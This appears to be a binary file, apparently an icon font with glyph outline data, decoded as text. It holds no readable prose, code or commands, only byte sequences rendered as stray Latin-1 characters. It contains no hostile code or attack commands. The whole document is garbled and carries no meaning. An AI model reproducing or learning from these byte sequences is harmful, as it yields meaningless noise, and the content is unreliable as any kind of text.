üg™
PPð	ýÒ.

ýÊ
ÿjkR!"3!2654&"&462%!!Dý` þŸ	



"ý§YRüh˜ü.

?>ÿjäR(,!"3!2654&46;2+"&5"&4627!!¡þ¦''Z''ñ::-$±þpR'üž''b'7ü$%sÐÿjØR )!"3!2654&".4>2!!"&462Ãþb		ž	Ø,I++IWJ++Jþph/B//B/R
üB
	¾
üƒ+JXJ++JXJ+˜µýV"//C//ÿjôR!"3!2654&"&4627!!ªþ”++l++Ò(ÅþH¸R+ü¬++T+üA((†ÿÊèò,<@DHLPTX\`dhlptx!"&/&76?67676&'!"3!2654&#!"&5463!23#73#73#73#73#73#!!75#3#%3#73#73#73#3#73#ÁþJ*$1)"
þTšüfšü»VVUUƒVV€VVUUVVþYþ§TÔVVUUVVUUVV~UUVVµ
(!>$/5'	
þW
©þ6©:GGGGGGGGGGG­H~GG6HÅGGGGGGG6HHHèm/?O_oŸ¯¿Ïßîþ
-=#";26=4&#!"3!26=4&!#";26=4&'326=4&+"!326=4&+"!326=4&+";26=4&+";26=4&+";26=4&+";26=4&+"326=4&+"7";26=4&#3";26=4&#3";26=4&#3";26=4&#3";26=4&#3";26=4&#3#";26=4&7!"3!2654&#!"&5463!2Zhh’þN²þ&hhl__^qqþ-88a99c88b99a99þ99b9%9&9$9&9%8_99yü:

Æ



üb

ž
999999š99999999999999s99L9999999	9999	999é
þ

ú
þÒÿÕ«è$(,048<@DHLPTX.&'&76'&/127>''7'''7'''7''7'7''77'%7'77'7©êþÒ$%
þÕér¤B'AC(A(?B(BC(A(9A(BA(AA(AC(A(nA(AA(A='%',(A(,(A(^¸'$
(#·þ~y'A(mA(AÉ(A(mA'AÍ(B(,(A(ò(A(mA'AD(A(,(A(j@²?A(AB'Aè‡/37!2654&#!"463!2#!"&5!"3!26=4&#53}ïý3zý†1ü2Îþf¤¤‡æþ¹þŽ\##$
ªg $(%4'&#!"#3!26=2"&46#53%!!X
ýz
R
þJ	<tt
ýs’«þVÎ		þ$ ’èr07!2654&#!"7!!5#!+"&=!5##3!26=|ðý	ôý
þÞ	
þÞa²}¿þA¹#þ<%

ÿjñR#GMt.'3676767>'&&'&'&'&'&'&5&7>7"2646?&'."'&#"26267>5'.ämk|-;\€;+-9aX8,wgh|Ý




		
			±JUUKI •F
9,) /$8)K33'“¢þ‚F'33(, ",),9
E•¢ŽOQFIž™Á4	

ÿ¬ªô326=4&+"&=4&+"&=4&+"+"=4&+"+"&=4&+"+"&=4&+"+"+";2+";2+";2+";2;2;2=46;2;2=46;2;2=46;2;2=46;26=46;2=4+"&=4;2=4+"&=46;2=4+"&=46+"&=46;2#";26=4&C``O?,?,@,?O````````O?,?,?,?O``````×àà<tt?N]]]]]]]]N@-?,?,?Q^^^^^^^^Q?,?-@,þíà*ttÿjºU	LY.'6"'&5&7676767.'32767>767632>/&'&.>&gr¦%L^_þõ,+#%)+#%($
´9Wþ™@/& (' #L!"cf4)+=w½&^_&
6Ui9%˦r&_^L%þÂ#%	


gW9þK;:/CR*5;1a”&%:iT6
&_^ÿ¥]HXi%&'&'&'&7>327676?6&'&/&#676?67676>'&6.'&66&'&'.7<?N=:@- &(
(€?HCTþÞ	 %L!!%,>>B5	6)+0
Q€	.	
ƒQ
 ,t/1\&	3)".
'*	j6;8
$N
þ§
%O"),-*,[

ý&\O
yO=Vx
	$UQ)#ÿÆèö%!!#!5#5!!èüܟnŸþ°üPp†ýzy11yjý²ÿjýV6BOW4#'&4?6?676'&'&'&2>54'&'&476767&'&'".=3275

!
	
?47"GzzG# 84þÏ-+3;;)"®:ctc:rrn\UfO39u%


(+8þ»FxFFxFE<-)¿)!þÕÌ9a99a9˜! 4 -"(Bÿe~[0B‡™#&&'.+"&5463!21326=6&#!"7?64/&#'#".>76;26&'&56'54'.'#&7676".>'IDC(‰ #$V"#î‘þáL~

	×7 
1;-	24#-{ $$O:!%2%G485$%þÏ),3+Dˆ‰9$
%!:#$!ç¶´® 
I
K!
1a1F7F(+7'01 Lk\·‰!'0&W'),;0aHýµ30,<	ÿüÿ¾ëý2:CGKT]fo%&/&'&'&'654&'&#!"2763!23676%##7#73'"&4627!!!"&4627462"&"&4627"&462è


ý	

	füà%(%n"&cx"þê!	









$




 6R<n'

'þ’<Z-!|ZÖÖ2þ+I#!ÿhÍR:Snw€çóü!7CLUZciy}™¥©ºÃÆÖßãôý%676?6767>76375%'3&547560'#&/"'0154+5301565&#'54/&/542325#'&=4/542=43%264&""&462&/.'&'&/&4#&#&"#01++"&57#"'#"4#&"676?67676;2?7>54%462"&5"&462"&4627"01#56;2=4+"=32#&70#"+5432=46;7462"&5"&4627"&4623#0#015%#326=4&+"3#&;2=4'%3'"264&''7'77'3#%?6=4&+"%"264&7'&+";2?6%"264&#53%#";26=4&264&"‘

+(	þ„8Û	¢”




1

+	x
,		
	
%m%	þ‚
	D%%4%%7
;+
0
		
C%%3%$üÝA€?x€þB;“xxýä??±C	

				2þÓg




þ“
7

þó
F#:ïPý`
+EZ
š821

@		@
28
%,, Ýd&5&&5&@!
¤@&5&&5&s< ýÀþØþB@@Ã(ý

8G							1+
è@%1:FJV_hq!"3!2>=4.2"&462"&46%53533##5"&462"'&'76;2%!!#1>;27"&462'"&462"&4627ýz0Q00Q0†0Q00Q	

 üÊ%%&&%L  #&	sý”lG$	&

	

#



@0Q0b0Q00Q0b0Q0u{!!S%))%%%z ª
8[þxÓ

R

(ÿjR!)5+".=#3#!5#527676=##"!.;2>5!Ñ7X.?.X7?%$:;>½¹½>;:$%?¾>0G9Hì":"?":"þÅ0/[88[/ÃÃ@=;%&‚AA‚&%;=@Ã_A00AýÞ#<##<#ÿ¨ƒ"2>KXfo!"&67%3264&"+"3!2654&5463!2#!"&+"=4;2+"=4;2+"=4;2+"&=4;2.462`ý×j%%4$þ2
×ýVýå-NFMô(89O89ñ«
$4%%ÛýýþÔ¶¶¶¶¶¶¶¼8O99P8ÿj&R,!"'3!26754&#!"3!265%#"&546;2üýðØ"ýðýö	

		

z

OSü£}
	o	

	ý‘	
ÿjýR'+!"3!2654&32+"&46#"&46;27!!©þ—#11#i#11þü__WLL½þ*ÖR1#üÀ#11#@#1üO

7:èž#!"3!2654&'535#57'535#57%!!ÒüE


»	

þ				«ü’nž
ý®


R

ý”
úÿÿÿtém[?676'&'&/&'&'&'&'&'.'&'&'&7>7>767676&=476'&'&È7.
4-	

	j<<
	& 
8:XÚµs.
%&	B%P1/N£€?@V+].1K
&"	l+!*)1,% 0

Z<=@];“='#,5A1'1={=W>;+<gGzè|%=Obx…’¡°ÃØåö%"#"&5463!2#%232>'4&'""3454&#&"32651326=4&'#3!;>75.#&#3%"#&";2656.#&%"#"264&2326=6&"7"#"364&232675&76&"23>=6'4&#&"#&7454&#&"3662326=6&"723>=.#&"#&%"#"264&óÒÓ%))%O!**!þWXWïw([#$%"ý5jÛ5$Hý|H<o		>®	þ5	>C		
â

	W	>­		ý¿*>@*%ž%**!þY *k(
)-, 3µ%"$#ú$!?n>n"?n>Œ
>8	
>%>ü(>ÿi›S+4AX!"3!2>54.2"&46".47>2"&462"2>4.2&"'&'&'&>'ý™55g66ò$$4$$FJ}I%$}”|I%$}×%%3$$þÆ=g<<gzf<<g</Q3 
,3QR5üþ555H%4$$4%ýI}”?=II|”?>Ie%3%%4$v<fzg<<gyg<&-N./M-ÿtèH&6Oi%#"&54&"#!"3!2654&"&462%#!"&=463!26322?64'.#"2%&'&"27>22?64dc!. ý˜V		ý5'KþO±Ÿ'53(?$Y152,?‰8HQ²PH8>,oxn,>Ÿ  þüþñÅ'&
		CÛ!> !=Ô3!"3>(*)(>è_(4=AJS\en!"3!2>=4.32+"&46462"&##5#53533"&462%!!"&462"&462'"&462"&462'"&462bý$$>$$>$Ü$>$$>ý÷ùùþÅ{&&D	

ýÎ27$#_$>$÷$=$$=$÷$>$cs&þä



JN¦(O'bÿj
R!3#'535#57'53'577!!Ü1þ»XX%(####Ïþ àRüèüg<C ÿjPR/##1"&5'.=4675#"2767654.µ Ÿ*G*0.NR¼RN.0*GR_	"k"	”“
#k"	_*G*þ^RN.00.NR^ñ*G*ÿj}R=IV_j”®ºÄÍÖ"264&72656=#&"264'.'5'5#;27676?7'57'3"/"&5"&462"'&462'2?332?4/52"/#"&4?63"10#52?64&#"&4637'57'57'"&462'"264&'2?5#-1VJVN%`X


		
-*/		



		

ƒXkþad		ýœþ¹h	ý³**Ó	
&	:			
Š'&"4&+"'&"27645‰
Z

6
f6‰`


þ©€6þó
 ‚!764/&"2?64/!26=4&	þ©€6þó
6‰`


¦€5þóþó5‰
Z	
 ‚!'&4?62"/&4?!"&=46ßW€6
þó6‰þ 


¦€5þóþó5‰
Z	
Š%"/&4762"/+"&«6
5‰
Z

IW€6
þó6‰þ 


ÿ¨©	!	7	©ü•öþÀþÀ&&Xlü”Nþ·IþÑ/ÿª©	!!		>kü•gþÑ/þ·IVlþÚþÚ@@ÿ¨ª
!!	7	ªü”kýš/þÑIþ·ü”lý$&&þÀþÀÿ¨©	!	'	>kþÚþÚ@@ü”lý™/þÑIþ·ÂŠ )2%"/&"2?64/&"'"&462'"&462'"&462ÿ
‚%¾
¾&
:0E11E0#2##2#$$¯‚&
¾¾
&"11E00|##2##^$ - )2&4?64/&"2?64'7"&462"&462"&462E‚&
¾¾
&k0E11E0ˆ#2##2#f$$S
‚
%¾
¾&
"11E00###2##$!- )264/&4?62"/&4?"&462"&462"&462£‚&
¾¾
&<1E11D2·#2##2#‡$$S
&¾
¾&
"11D11"##2##$‹ )2&""/&4?62"'"&462"&462"&462ÿ
‚%¾
¾&
:1D11D1#2##2#$$
‚&
¾¾
&"11D21Â##2##$$ö%76&#!"2ÿýÚÿ(Õþþ‹Ž76/&4jÿÿ€ÿýÚÿ(ŒŽ'&?64}ÿÿ€ÿýÚÿ($ö#!"&?62ÿýÚÿ(çÿÿÿ¨ª,276764'&'&"762"'&4?622?<:cfífc:<<:cfîfc9<ÌÊ;þØþØ;Ê^wfc:<<:cfîfc:<<:cfŸÊ;þØ(;Êÿ¨ª,"276764'&'&"'&4762ôwec:<<:ceîfc:<<:cfŸÊ;þØ(;Ê<:cfîfc:<<:cfîfc:<þ3Ê;((:Êÿ¨ª,276764'&'&"'&4?62"/&4?64?<:cfífc:<<:cfîfc9<ÝÊ;(þØ;Ê^wfc:<<:cfîfc:<<:cfkÊ:þØþØ;Êÿ¨ª,276764'&'&""/&4762"/&"ôwfc:<<:cfîfc9<<:cekÊ;((;ÊX<:cfîfc:<<:cfîfc:<ÞÊ;(þØ;ʾŠ''77'¾9‘:ÊÊ:‘9ÊQ99Êþä9‘‘9Êÿ©U+:676737'#.'57'7#7'7'377'4673'.ø}
ŽŽ
}ø(z
ŠŠy(ú}
ŽŽ
}ú#
\\>W{þÂ$
"#l	z
ŠŠz(ù~ŽŽ~ù(yŠŠ
z(þ°Q¿º8&%!%'#¾‹/64/&"2?64/&47&4?64/&"2?64'
bËc‘‘*4þíþî3º$º4þíþî3¾‹/&4?62"/&4?64'64/&4?62"/&47ú‘‘cÌb‘‘*4þíþî3º$º4þíþî3!Â'&""/&"27%644ºº3¢cc‘‘X‹2?64/&4?64/&%‘‘cc‚þîþî3ºº4X‹2764'&"°cc‘‘‚3ºº3Â%&"2?622?64þîþî4ºº4-‘‘cc #,5>GPYbkt}†"&462#"&462#"&462#"&462"&4623"&462%"&462"&462'"&4627"&4627"&462!"&462!"&462#"&4623"&462#"&462¦ÀfhL£þüK£þ6VÀK¿hX±þöYXY›Š#,5>GPYbkt}†264&"264&"264&"264&"'264&"5264&"264&"%264&"264&"7264&"7264&"264&"264&"264&"5264&"264&"þX±þöYXYÀfhL£þüK£þ6VÀK¿›Š#,5>GPYbkt}†"&462"&462"&462"&4627"&4625"&462"&462%"&462"&462'"&462'"&462"&462"&462"&4625"&462"&462êX±
YXYÀfhL£þüK£þ6VÀK¿ #,5>GPYbkt}†"264&#"264&#"264&#"264&7"264&3"264&"264&"264&"264&"264&"264&!"264&!"264&#"264&3"264&#"264&¦ÀfhL£þüK£þ6VÀK¿TX±
YXY B'%'7¬A¤¤AäX££AääBA££A䣣£Aää B7%7'<A¤¤Aäý¨££AääBA££A䣣£Aä侊%'7/7'ô:ÊÊ9‘‘9ÊÊ9¥9ÊÊ9ã‘9ÊÊ9ÿ¨$^n&/&'.#'"76?>6=7>6765?>656454>2>565&'&%!26=4&#!"	

ƒ	
(P7!"/&% þÀÿ('
	<9
#E/"
þŸ!#ìJ0<]W
	\\¸¡%%ÿ¨ 4."/5..=4'.&'5'6732?64/&"#&'52?64/&"2?#764/&"2?64/3/&362676?6767674
 !y2dd/x	2dc/	x/cc3z	Dd1
nn	

9
Ll42\	ª2cd/
z3cc/x	/dd2	þã9T*	':$	™ÿ¨'Wl‰4."&/5..5'54'.".=4&"/&322?6765234."7&54>2763&54>254&'&"6'"#$-	KAD!
		¥Rþ«+I+2UdU2("+Iš/?l~l?'I>@”@>I3	i"9	xV<"-Ü þ·@	<79	C*	C 29+H+2U11U2A3,6+H+þÒ=P@l??l@J}%%%%~JVH
ÿƬöZp·."'&5<..5'4'."'4'54&"'&/&;676?676=4234."7&54>'&"#."5#764/&"2?64/36763&54>254'32?6/!")F,K$	æ		þÂ(D(.O^O. (DÛJ)Ÿ"tŠu" )II)Š/
,;dvd;$‡)J‚
O	K#Q+*_ÍþÍ:	%?
50	!/ï(D(/O..O/7(3(D(%Œ		M9DE:M
Œ
Œ
N$(RB:J;e;;e;&&N		Œ	 ‰( (2=EOZÇÒÜäïùý (.:ELSVZ^2	>#&5463654&	&"376?'6=&+'76&/"#764&"76?6."'76.#"#5676&/"7>.7>'.7>.#767'37232?2?6???6?2?5671?232?6?3276?6?3?3767673'7#76?7'76'676'6763''"'#767762'6?6'"'7'5&7#767#"'.?&'4767#'.?"'&'1&767'.79"'.?.?67'.67'#"/.767741736'7>'716?62'6?#&/67'6?4/7?'?6?5'?6?5''6756&/736?'?6?5'Ü		

þèþçþòþó
?E?'"&<
	

;1%
&-&
%$;)!	9%	
&#^."
8	+ZJ	þö(

	Y	A6;=F		

	
žb#'J
Úk&
& 13	>$	\(4
r
c"ˆþ÷
þè	þçþèþè	þò
)ÿ@aIL%K?!		>## %1$0
X&
FG>PB<I
	K#D„[>'["U.		˜’		›	
'F	>
2	8(P-"þûi_
	uc
 
!
!	
!	
#
A!	2'	
9Õ9š¶KATa%
)c9
=U&()#
T
B!Š%.7>ENTZem{…‰z‚ßãì÷#.8AHN%!"'563!2		3!26'	64&#!"	#'&'73&'&'#'&/73'2#1&'73&/#''76?'#"/&/76757''#''//7&'#'3'7;675/>&/&/764/;>&/7>&/5'&/6?4/;>'&/3726/32>5''7&/'#/&'&+'&'5&'&&+'&+'&'&/&&'&'&/'&#77'"51''&/7.>'.>&'#.>'.6?2'.6?25.>'&7>'&67632&/5&7>.7#72'75?'77/'7#"'77"/377"/'7"&771#"'7"77##"77#''&7
þçþç	þøýÁ	þòþæþèüWa	
*PyO!'*éµKA$`'Gb8- &C0’
ñÿ?aIL
J?8!		
>>$'12

`
F3>"5B	=?*K
$ „@Y%z†0		™82'ËE0_
uc
 	!	
/! 				þû9Dµ
!	
!	

	

'Iz*2þøþö
!þé
þéþë
323M)
	k&&#<H>#,,(#	J
ÿ@D>&
&<
:	!

1	%&1	
%<
+"9	!%'

^!/	LDZG#'$#;<E	
	

		
	

þû()	
6	

1	 
-)
'	Š%)06=DNUajvƒ‰|„æêõÿ*5>GNT%!"&'&7	&463!2"	3!275&##?#?'367#7#'3?6?#76767'3?7217677+&7'7767775#&'77'6?'7'"5'676?57>'5.'76'.7673>.767>&#'"76/."'673>'5&7>'&#76&'#"76?>'.#7676/74/6?32?32?32?1276?3?#32???327'76?54'5'3#'07"'"776?637#67663273676963>376#6?6327667'1767''&6?67'&?"/&67573'&67#?67&'&5&?"/5&767+"''&?#'&?#"/7'767367÷þè

þ÷þçþÞ
þò
þèAL'	<)¡w‡	:'T
6JKm$A
H"f--J²&0d™	@A4['Y@…C(K*?=B5&?3F
`

2'$'
3=!8>J
La@ÿñ
	×(2¼
_I/	þü
 .		!	cuD;Þ
 !
	!! +
	")' *2

	þçþçRþóþòýÐ(RJ

.1J&+#&G?3,.,'	Z!!8
/!^#"&%!	9!*
<%
	1&&	!
;<&
'
D@þõ	'#,;&

				

F<%(	#
	
)'
 ˆ)&18BP¸ÁÌÒÝäèòú	%06<@FL7"&5473'	'27	7654'#7=3'7#'&/&"'&'.#'&'&"'&1&'5'&#'.'&'&/&#"'&+'"7/2>'&/676&/>/37>'&/532726/712>/264/337>/36714'7'&#'"7''&77/7/&77#'&2&'77#'77&/&'2&'&6?23.>&/&76'&>23&676&'&71>2'&6?6321'&>'&'&67627'&/3&5737'7/57'73''7"/&7?37&''?67'&'7'/7'5'7'7'5&5&''767/&'7''&'#/7'57/'&/'&/Ü
þöþ÷

þéþé
	JZ+	L	".^#"
&%	9
!*	;$%
&-&
%	1	(;	

<&1&D@û(	

Uc‡


	
		
E:5þû¦
M'#M
(þJ&+#&@31R>	/)HG
GA,›'$t2&"5þçþè

þ÷
þò
þèþè"ñ		’™		.U"z%>[…C(K*)=B5
!>GF
&X
0"1%

M>
	!8?K7L	a@ªI'5
*8H#'
	

!
	

!
".c;	^h
þü	9		!(2
!
! ×D;þJKm$A
1
aT¡c?O?H&sA-(L6!e
CB ‹)049=GLPU¹¿"3654&	&6716=&'#77676=&/76?676?7>'&'16?6?67'72>76756??6?6756??16?6716?676?673767?5'3"76&'1&#6?4&6?6.76.#676'.7>'.>'.>.>''Ù
	þñþó¿H“`D0(
MMä@ET"AYIþë$

-!
+		
#_Qa
B
þö
 þ	-
-
%	
ˆ
þäþæ
	þñ
—u4“£;	U20»	1=˜0sA§
T4C@
˜%G	)1B(..
		7#D†››

|
*(Kpþ"6&0
!
//(%'
(# (049?JOSZ¿Å4&#!"3!2676'	6&/9675'2675&'#'#'#'#'&/7671//7&/0"'&.'1&'&&'&1&'&'&'&&'&2&/&+'&'374'&'>&'#&/326&/>&'101'>&'5'&'17>/7>/71>/>/7'7&' 
þâþã	þî˜]%4•¤[	T5½	1=™ s
A¨
T4CBš)G)0A)
/0

7*EˆDYZG¶
~
 2Kqÿ70
	!
00	(&$'

(|
þâþãþ<
:•a.E2
(
NN
æAET#AZJ%
.",$#`#/8-\

 ÿ
--"
%		
 $-58=CKNQWÂÇ%	3!275&#!5"7796773?#76?#7#767#7'?67??17	'#"5767635>'5.7>.671>.767>&'&7>&'1&73>.767>'&76'.6?#>'&+&>'14+376'676717677677671?676?32767#?"6'1&'Ïþî	þãþâ
°.0%]4	[¤%
bT·41	J$
™:AB
FCM7 ‡šþþ
¶GZ	YD‡E+7	;.)

1	)GZKR
(

'
%	00
!	1&7"ÿnþðþïþT.:
4.a32
	NqA
F",8E[þô
\
-8/#`#$	,
.%* 
	-	.
 ˆ*14;AIMPVº¿7	654'#32%'36754'1&''76754'&'7'&'7'&/&''/676&'7//1'7	#'&'4'.'.&'1.'&'.'&1&/.'.'&&/.."5'&76&'7>&'676&'676&/676'&'371>/1>/&'765'&'771>/3"1ç
	þåþå

§.H5(`.
		MpAŽ
F",7
HYþì

eL
Q_$	,
.
* 
	
-	
-	þ<
þñ	þåþä	®-4u4L¢%02Pµ4	J	˜:AAFCM6˜ÿ

Çz'
Ϡ++6	0/)0	),ZKR


'
(//
!
0&
	6"þÿiÈV1gt&'676'&/37676'&76&/&'&'&/&'.676??6?>'&".4>2X


 $)
3
%* 
>7
	z	I_

%"iG&F2	4n}-
#j

þ5!:#!9B:#!9À7"'?7(!,	'	íÉ/þbf%Dt9?D'B'<s>.
W (!¸×	)+!9B:#!9B:#ª”aq%6?67>5&74&'&'&'&/&#+";#*"32#+"3:2#"33676;2654&+"¾&

=7
#E/"
ChÐ)!"ì
I01]V	
[[¸¡%%K	

ƒ	
(P7!P	/'% @ÿª‘br%&/&'.56'46767676?>3;2+3:2#"3;2#*"32##&'&+"&546;2*&		
=7#E/!
ChÐ)!"ìI01]V	
[[¸¡%%K	

ƒ	
(P7!P	/'%@ÿÿ¨%_o%#&"&'&'&'&/&676>56=4>>56454>656=4>36?54>!2#!"&=46	

ƒ	
(P7!%/&% þ¿ÿ”&		
=7
#E/A
hÐ)!#ìJ11	]V	\Љ¡%%ÿ¨ª	
%	7!%!!ô(þ½þ¾'Ñü•KüÔ,ýOó$&þ´L&ý‘lü” ,Ýÿ¨ª	
	'	7!!!‰$&þ´L&ý‘lü”LüÔO^(þ½þ¾'›l üÔ,ýOÿ¨ª	
%		!!!;&Lþ´&$ýßl üÔ,ý±C(CB'þå¶ü”lü´,{ÿ¨ª	
	7	!!!ô(þ½þ¾'šk üÔ,ýOÉþÜ&Lþ´&oü”lü´,ý±—Š32"/&6;46;2n‰ˆn
pþdˆˆœ 26=4&#!54&6=þdˆˆ9n‰ˆn!!?64/&!"✈ˆþd9nˆ‰n
—‹%326/&";;26n‰ˆn
Lœˆˆþd·Š/2?64/&""/&"&"2?622?64'Þ	
£		
	h
	i	
		Ñ
	¤		
	i	
h	
		¢		¤	
		h

h		
	þÔ		¤	
		i		i		
	 Q/762"/&4%762"/&4ÔË!!Ë8Ë!!ËzË!‚ ‚!Ë Ë!‚ ‚!Ë  Q/'&"2?64%'&"2?64Ë!!ËþÈË!!ËzË!‚ ‚!Ë Ë!‚ ‚!Ë !"/&4?622?62û'û)¡
* )®ûû)  )·Š/2?622?64/&"&""/&"2?64'H
	i	
h	
		£
	¤		f
	h
	i	
		¤	
£		¢		i		i		
	¤		¤	
–		h

h		
	¤		¤	
×A%&546;2;2#!" 
ãþŠcã×@63!2+"+"&54 cã2âc®‹%764/&4?64/&"2‰  )ûû)@) ( )û(ûÖA%654&+"+"3!2ÈâcŠcã×@&#!";2;2654Èþâ2âc­‹%764/&"2¤ûû)  )@û*û) ( )!'&"2?622?64û)û)¡( )ûû)  )ÿjR )2;"2>54.".54>2"&462'"&462'"&462ôJ~II~”~II~¢@l€l@@l€l@¥*:**:**+ RI~Jþ:J~II~JÆJ~Iý)@l@@l@Æ@m@@m@ýÝ**:**k*Pèo )2;4.#!"3!2>2#!".4>3462"&7462"&7462"&èI~Jþ:J~II~JÆJ~Iþï@m@@m@þ:@l@@l@¤*:**:*œ*,t ^J~II~”~II~6@l€l@@l€l@ì**:*** èo )2;3!2>4.#!"%2#!".4>3"&462"&462"&462I~JÆJ~II~Jþ:J~I×@l@@l@þ:@m@@m@j*:**:*œ*,t ^J~II~”~II~¢@l€l@@l€l@ì**:**+ÿjR(1:%4."2>'".54>2'"&462"&462"&462I~”~II~”~I%@l€l@@l€l@¥*:**:**+ {ÆJ~II~Jþ:J~II~J@l@?m@Æ@m@@m@]**:*)¦*{ÿjR0A2>54."4>2".5%'&"2?64&"'&"2?64&"ãI~”~II~”~I%@l€l@?m€m?Xllrr/œ
¥
¥
Aþ:J~II~JÆJ~II~J@m@@m@þ:@m@@m@–llqq‹œœ
¥¥
èo,=!"3!2>4.!2#!".4>6/76&'64&"264/×þ:J~II~JÆJ~II~ýðÆ@m@@m@þ:@l@?m;6446wwqoI~”~II~”~I%@l€l@@l€l@ï6336rvvpèo ->3!2>4.#!"%2#!".4>364/&?2?64/&"I~JÆJ~II~Jþ:J~I×@l@@l@þ:@l@@l@Ë644Mqqww^J~II~”~II~¢@l€l@@l€l@ï633©ppvvÿjR,=%4."2>'".54>2'62/&?'"&4?62"I~”~II~”~I%@l€l@@l€l@ï633©ppvv{ÆJ~II~Jþ:J~II~J@m@@m@Æ@m@@m@644MqqwwÿjR 7"2>54.".54>2/&4?622?62ôJ~II~”~II~¢@l€l@@l€l@c	Y	Y	RI~Jþ:J~II~JÆJ~Iý)@m@@m@Æ@m@@m@þ‚‚	YY	èo 84.#!"3!2>2#!".4>3'&"2?64/&4?64èI~Jþ:J~II~JÆJ~Iþï@m@@m@þ:@l@@l@	‚‚	YY^J~II~”~II~6@l€l@@l€l@|‚	‚	X	X	ÿiÚR!7G5.54>2>54."546;232"/&63#"&=46;2.O2?Q5[l[6R?2O.=j|j=Î		DU
Ub				mþƒ5]A jC~6[66[6þƒCk A]5}>i>>iý#ÿ		ÿTT¡	^		^	ÿÿèC!7G2#!".'33!2>4.#!"#>354&6=326=4&#;26=4&+">i>>i>þƒ5]A jC}6[66[6þƒCk A]5þÞTTÿ		¢	^		^	C=j|j=.O2?Q5[l[6R?2O.ÎDU
TD						éC!7G!2#.#!"3!2673#!".4>#";?64/&54&+";26å~5]@ jCþ‚6[66[6}Dj A]5þƒ>i>>iÝÿ		ÿTTý_	^		^	C-P2?R6[l[5Q?2O.=j|j=Î		DU
Tb				ÿjÙS!7G%4.'".546752>+"&=#"&?62#32+"&=46Ù.O2?Q5[l[6R?2O.=j|j=Î		DT
Ub				O~5\A jCþ‚6[66[6~Cj A\5þ‚>i>>iÝÿ		ÿTTý_	^		^	èo 83!2>4.#!"%2#!".4>32?64/&"I~JÆJ~II~Jþ:J~I×@l@@l@þ:@m@@m@ÄYY	‚	^J~II~”~II~¢@l€l@@l€l@|	X	X	‚	‚ÿjR4%4."2>'".54>2"/&/&4?6I~”~II~”~I%@l€l@@l€l@|	XX‚{ÆJ~II~Jþ:J~II~J@m@@m@Æ@m@@m@YY		 	''È,,U××ÉþÔ,V×× Š7!5!#ÈXþRª2ª® Š3!5Ȫ®Šý¨®ªµŠ	7'7_þÔ,V×׊þÔþÔU×× Š%#!! ªþRXÜ®þRª Š!!3vþR®ªŠªþRXµŠ%	‰,þÔUÖ×2,,U×× %77	××UþÔþԝ××V,þÔÿ©ª'!"3!2656&"'&4?622?62gý&&æ&'UþØþØ;ÊÊ;'ý&&æ'þ¯þØ(;ÊÊ;ÿ¨ª'4&#!"3!6%&4762"ª'ý&&æ'þ¯þØ(;ÊÊ;æ''ý&'U((:ÊÊ;ÿ©©'3!2654&#!""/&4?64/&4?62?&æ&&ý&P(þØ;ÊÊ;Ñý&&æ''UþØþØ;ÊÊ;ÿ¨©'!2654&#!"62"/&""/&4æ&&ý&&U((:ÊÊ;X'æ''ý'Q(þØ;ÊÊ; lQ2?6"/&"27%64/&""/.=4627%>=4&/&""/&"0²R`±		0±±
²/±±f¥p		4<p		o	§¦pp	
q¦
n	ppŠS'&"+"&'&'&4?64'&'.+"2?64/&4?>;6;2676764/&4?64ü¥p		4<p	o	
¦pp		q¦
n	ppH/þú²R`±	øþú0±±²þú±±ŠQ762;2676764/&4?>;2"/&4?64/.+&+"&'&'&4?64/&4ì¥p		4<p	o	§¥pp	
q¦	o	ppH/þú²R`±/	þ÷þú0²±²þú±± lU%'&47%626=4&'&'&""'&/.=467%62"/&"?62"/&""0²R`±
		0±±
²¶	//±±V¥p		4<p
	o	§¥pp	
qt	o	ppŠ/54/'.2?6&/&4&"54&ým:øø;lŠ|bþ¡n*ùù)lK^— k/'&+'32?'&#!7>/.6?6&/!26/4&+'326 |bþ¡m*ùù)lK^—Um:øø;l k/74;7#"/763!'.?>&/&6?!"&?46;7#"&È|b_m*ùø)lþµ^—Um:øø;lŠ/%'"='/&5/.?62&//"&='ýn:øø;l2|b_m*øù)lþµ^—Š'	7	'	7þË5þÜ&þÌ4þÝzþÔþÔþÔþÔŠ7	'	7	'Ó4þÌ$ýÙ5þË$zþÔþÔþÔþÔ 	7	 þÔþÔñþË5þÜ#—Š		—þÜ#þÌ4zþäþä,,–Š%	7	R$þÜ4þÌBþÔþÔ %	'	þäþä,,¼#þÝ4þÌÿýÿ¨êEbs‚š±Æßï:Mr‡¾É×ë4'&'&+6767676'%67>767&'&'&'&56'4674=&7>76;&'&'&#'&654#!"7636'"&=4;2#7>765&75&74&&5&747676%45&76&'%&6&7'&'.=&746456#&;2'"#"''&/&767>/&'&&"''&/&74767>76'.'&7>732?67>56'4'&/&747>&'&67676%&'&675&6&&'.7>76'.'&6763223676&'"?67654'676765&'&+"ç$˜K
 ?$ŒG		
ü¦^/?	. 
FX+	
!¾>4k:

z˜`0þí/1;Z=â6í4xQ¶[.¹.*6Qg4+¢Q ·þã-&/¼/"!ii%5kK,ç(åå(1!	



 L
ÞW•ŠE%&2; 		Kb‚K˜K˜EK&#\:!	þ†


°&
,	Z!	
	
øC‡+

&7.%"!_s7 ŠJI$1	þú[1-þõ/á62æ3	9sV*9W<þÞ7rr0"0H0Q9.þí$99A!	
BY,&21J0‘nn)ll

	
	 	;
#5

y
Ønn+Ï%


::(	/G^//.ã
X+5.!


õ
þ4	-ÿè;X6?6?654.#"'654&'47676732>4."&#"."2>54'?6732767»
2U2>1O
 6  6@6(E(\>K>$$>J=$f(D!\2U2($#=
2U2&`#=> 
6@66@5.*	(E(4 '$>H>$$>$"!L/72U2ÿj¦R9PczŠ.&7!'&76;626'5&'&'&6767>76'&'&/47>'&'&'&5>76%'&'.?67476.'!"#!5#Ž) ý‰%*(@7
.E	Ic1	
	E2
6CýX	 
	+{=$	+
í"+ ÈþÔcIf
"&`S0J (.'#		O
	-ec!"&#	U$	[‰$ [=Å(%9	[~
ýÏ,!ììÿgÅ`6V_o265676'&'&'&'&7676?676767676&'&'"?676767676767"2>&476'&±.,260&%$#O$
nBPVlA3
80#3!##8F..2m#GA/FEH:+TA-+', ,±%ýqD=*70		,#;$/cwnO$0)850
 J]bP@("6

"8%
[4-
A !,!
O7!/#&{&%ü (7#
ÿ¦¡6"3!2654&#&&#!3!67676?>/!2764™µç+üÏ	w`+
5;0^ w

þíý¸
„<	$HQ@‚			Üÿj‡S"2HVh3!".546763##&3"#"7!276&'&#'23627>'&#!"36"#"3!2'4&#!#'&'&?6!2yý³3Y5TEZ´ìgNét'.(!ÎFG

	
?	
þé	
=.GH

¢þ

	Ö	Q’ü¬2U3MOAOüOëýæ:%'C°þC
